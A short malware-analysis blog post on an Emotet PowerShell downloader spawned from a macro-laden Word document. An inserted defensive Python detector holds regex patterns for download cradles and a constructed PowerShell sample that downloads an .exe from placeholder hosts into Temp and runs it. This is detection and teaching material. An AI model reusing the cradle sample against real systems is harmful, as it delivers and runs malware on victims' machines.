Today I wanted to do a real quick post on a PowerShell downloader linked to Emotet. Here is a little background on what Emotet is according to Malwarebytes:

Emotet is a Trojan that is primarily spread through spam emails. The infection may arrive either via malicious script, macro-enabled document files, or malicious link. Emotet emails may contain familiar branding designed to look like a legitimate email. Emotet may try to persuade users to click the malicious files by using tempting language about “Your Invoice,” “Payment Details,” or possibly an upcoming shipment from well-known parcel companies.

The strain I will be looking at was delivered through this Word document, acquired from https://www.malware-traffic-analysis.net/2019/01/18/index.html

Once the user enables content and the macros inside the document run, cmd.exe is launched, which in turn spawns a PowerShell process.

Let's take a look at the contents of the PowerShell script that was kicked off.

So here we can see that it builds a PowerShell download cradle that iterates through the listed URLs, attempting to download 477.exe and save it to the AppData\Local\Temp directory. Here is a look at what some of the variables contain.
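As an added example (not part of the original post, and not code from the Emotet sample itself), here is a small Python script that checks for the two behaviours described above from the defender's side: a PowerShell process that has WINWORD.EXE somewhere in its ancestry (the Word → cmd.exe → powershell.exe chain), and script-block text that looks like a download cradle writing an executable to the Temp directory. The process events, process IDs, URLs (under the reserved `example.invalid` domain) and script text are constructed samples shaped like Sysmon Event ID 1 and PowerShell Event ID 4104 data; none of them are values taken from the analyzed document.

```python
"""Flag Office -> cmd -> PowerShell chains and download-cradle script blocks.

Added example with constructed sample data; not the original post's code.
"""
import re

# Office parents we care about when PowerShell appears further down the tree.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Building blocks of a typical PowerShell download cradle (case-insensitive).
CRADLE_PATTERNS = {
    "fetch": re.compile(
        r"net\.webclient|downloadfile|downloadstring|invoke-webrequest|\biwr\b|start-bitstransfer",
        re.I),
    "temp_drop": re.compile(r"\$env:temp|appdata\\local\\temp|\[io\.path\]::gettemppath", re.I),
    "exe_payload": re.compile(r"\b[\w-]+\.exe\b", re.I),
    "url_loop": re.compile(r"\bforeach\b|\.split\(|\|\s*%\s*\{", re.I),
    "launch": re.compile(r"invoke-item|start-process|\[diagnostics\.process\]::start|\bsaps\b", re.I),
}

# Constructed process-creation events (Sysmon Event ID 1 / Security 4688 style fields).
SAMPLE_PROCESS_EVENTS = [
    {"ProcessId": 1200, "ParentProcessId": 800, "Image": r"C:\Windows\explorer.exe"},
    {"ProcessId": 4100, "ParentProcessId": 1200,
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"ProcessId": 4388, "ParentProcessId": 4100, "Image": r"C:\Windows\System32\cmd.exe"},
    {"ProcessId": 4412, "ParentProcessId": 4388,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    # Benign control: PowerShell started directly from Explorer by the user.
    {"ProcessId": 5000, "ParentProcessId": 1200,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
]

# Constructed script-block text with the shape described in the post:
# loop over URLs, download 477.exe to Temp, run it. URLs are placeholders.
CRADLE_SAMPLE = r"""
$wc = New-Object System.Net.WebClient
$out = $env:TEMP + '\477.exe'
foreach ($u in 'http://example.invalid/one/','http://example.invalid/two/') {
  try { $wc.DownloadFile($u, $out); Invoke-Item $out; break } catch {}
}
"""
# Constructed benign admin script block for comparison.
BENIGN_SAMPLE = r"""
Get-ChildItem -Path C:\Logs -Filter *.log | Where-Object { $_.Length -gt 1MB }
"""


def basename(path: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def office_spawned_powershell(events, max_depth=8):
    """Return ProcessIds of PowerShell processes with an Office app in their ancestry.

    Walks ParentProcessId links so an intermediate cmd.exe does not hide the chain.
    """
    by_pid = {e["ProcessId"]: e for e in events}
    flagged = []
    for e in events:
        if basename(e["Image"]) not in POWERSHELL:
            continue
        pid, depth = e["ParentProcessId"], 0
        while pid in by_pid and depth < max_depth:
            if basename(by_pid[pid]["Image"]) in OFFICE_APPS:
                flagged.append(e["ProcessId"])
                break
            pid, depth = by_pid[pid]["ParentProcessId"], depth + 1
    return flagged


def cradle_indicators(script_text: str) -> dict:
    """Which cradle building blocks appear in a script block (Event ID 4104 text)."""
    return {name: bool(p.search(script_text)) for name, p in CRADLE_PATTERNS.items()}


def is_download_cradle(script_text: str) -> bool:
    """A fetch primitive alone is common in admin scripts; require it together
    with a drop to Temp or an execution step to keep false positives down."""
    hits = cradle_indicators(script_text)
    return hits["fetch"] and (hits["temp_drop"] or hits["launch"])


if __name__ == "__main__":
    print("PowerShell under Office:", office_spawned_powershell(SAMPLE_PROCESS_EVENTS))
    for label, text in (("cradle", CRADLE_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, is_download_cradle(text), cradle_indicators(text))
```

The process-chain check is the higher-confidence signal of the two: a Word document with no legitimate reason to start a shell should not have powershell.exe anywhere beneath it, whereas the script-block patterns need the combination rule above to avoid paging on ordinary update scripts that also use WebClient.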

So thank you for reading and until next time…

Happy hunting,

Marcus

References:

https://www.malwarebytes.com/emotet/